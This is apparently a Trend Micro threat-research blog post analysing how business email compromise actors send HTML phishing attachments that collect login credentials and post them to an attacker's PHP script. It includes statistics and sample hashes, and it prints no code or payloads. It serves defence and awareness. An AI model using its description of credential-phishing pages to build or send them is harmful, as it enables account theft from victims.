• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Social   »   How HTML Attachments and Phishing Are Used In BEC Attacks

How HTML Attachments and Phishing Are Used In BEC Attacks

  • Posted on:July 27, 2017 at 7:00 am
  • Posted in:Social, Targeted Attacks
  • Author:
    Lord Alfred Remorin (Senior Threat Researcher)
0

Traditionally, BEC attacks have used keyloggers to steal saved account information from target machines. However, using an executable file for the attachment usually flags a user not to click them as there is a high chance that the file is malicious. As a result, we’ve seen a trend wherein the attached files are no longer executable files but HTML pages:

Figure 1. Phishing Email with HTML attachment

Opening the attachment will launch a browser with the following content:

Figure 2. HTML Phishing page (Click to enlarge)

The page asks the user to enter their username and password to view the document file. To lure a user to use an email account, they added images from popular email providers like Gmail, Outlook, and Yahoo Mail.

When a victim enters their username/password and submits the form, the credentials are then sent to a PHP script configured by the attacker. Usually, this script is configured to send the credentials to an email account controlled by the attacker.

Figure 3. HTML source code with POST command (Click to enlarge)

Checking the source code of the HTML attachment indicates that it was probably coded in Nigeria, as the Google link was set to a version for that country.

Figure 4. URL with localized Google domain

This makes even more sense if one considers what we found on Nigerian forums. Nairaland (a popular Nigerian forum) contained an advertisement for scam pages. The seller offers different scam pages for various email services like 163 Mail, Gmail, Hotmail, and Yahoo Mail.

Figure 5. Website with scam pages for email services

Keyloggers are still commonly used by BEC actors to retrieve the accounts of their victims and are very effective. However, delivering an executable file through email can be difficult nowadays as anti-spam rules will quickly flag these messages. On the other hand, an HTML file poses no immediate threat—unless the file was verified to be a phishing page.

A phishing page can be easily coded and deployed, unlike a keylogger that requires some coding knowledge. A phishing page will also run on any platform, as they only need a browser, unlike keyloggers, which will be dependent on the builder.

One disadvantage of phishing pages over keyloggers is how they recover passwords from their victims. For a phishing page, a user needs to enter their credentials into a form and send them. A keylogger only needs to be executed and will then be running in the background.

In summary:

Keyloggers HTML Phishing Page
Password recovery No user interaction needed once keyloggers are executed User needs to enter credentials
Multiple account recovery Yes No
Multi platform No Yes

Table 1. Differences between HTML phishing pages and keyloggers (Click to enlarge)

HTML Attachments – Statistics

To gain more insight, we looked into feedback information from our products via the Smart Protection Network. From July 1, 2016 to June 30, 2017, we found 14,867 records and 6,664 unique hashes.

The following chart shows the number of cases seen per month:

Figure 6

Figure 6. Number of BEC-related phishing attacks per month

The following chart shows where the above incidents were recorded:

Figure 7

Figure 7. Location of BEC-related phishing attacks

The following chart indicates the keywords used in these attachments:

Figure 8

Figure 8. Keywords used in BEC-related phishing attacks

Other Phishing Email and Attachment Samples

The SHA256 hashes of the samples used in the original screenshots are the following:

  • 1b369df9ea0f75b5d40aa60c649f12d174e28f1177a473775d2d5454e4ca131c
  • ac5f29a25e918691f4949587290e9ef6ca4dae1398d3e4a1e5fe69687a67eab0

Below are several samples of other attacks that use this methodology:

Figures 9 to 13. Various phishing emails and websites used in BEC attacks

We recently talked about this topic at the RSA Conference 2017 Asia Pacific & Japan, which was held in Singapore from July 26 to 28. Our Phish Insight service tests the ability of organizations to resist online scams, allowing administrators to judge the level of risk they are currently exposed to.

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: BECHTML attachmentsphishing

Featured Stories

  • systemd Vulnerability Leads to Denial of Service on Linux
  • qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware
  • Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
  • A Closer Look at North Korea’s Internet
  • From Cybercrime to Cyberpropaganda

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Security Analysis of Devices That Support SCPI and VISA Protocols
  • January Patch Tuesday: Update List Includes Fixes for Internet Explorer, Remote Desktop, Cryptographic Bugs
  • First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group
  • Looking into Attacks and Techniques Used Against WordPress Sites
  • Why Running a Privileged Container in Docker Is a Bad Idea

Popular Posts

  • Security Analysis of Devices That Support SCPI and VISA Protocols
  • First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group
  • January Patch Tuesday: Update List Includes Fixes for Internet Explorer, Remote Desktop, Cryptographic Bugs
  • Old Tools for New Money: URL Spreading Shellbot and XMRig Using 17-year-old XHide
  • Patched GIF Processing Vulnerability CVE-2019-11932 Still Afflicts Multiple Mobile Apps

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.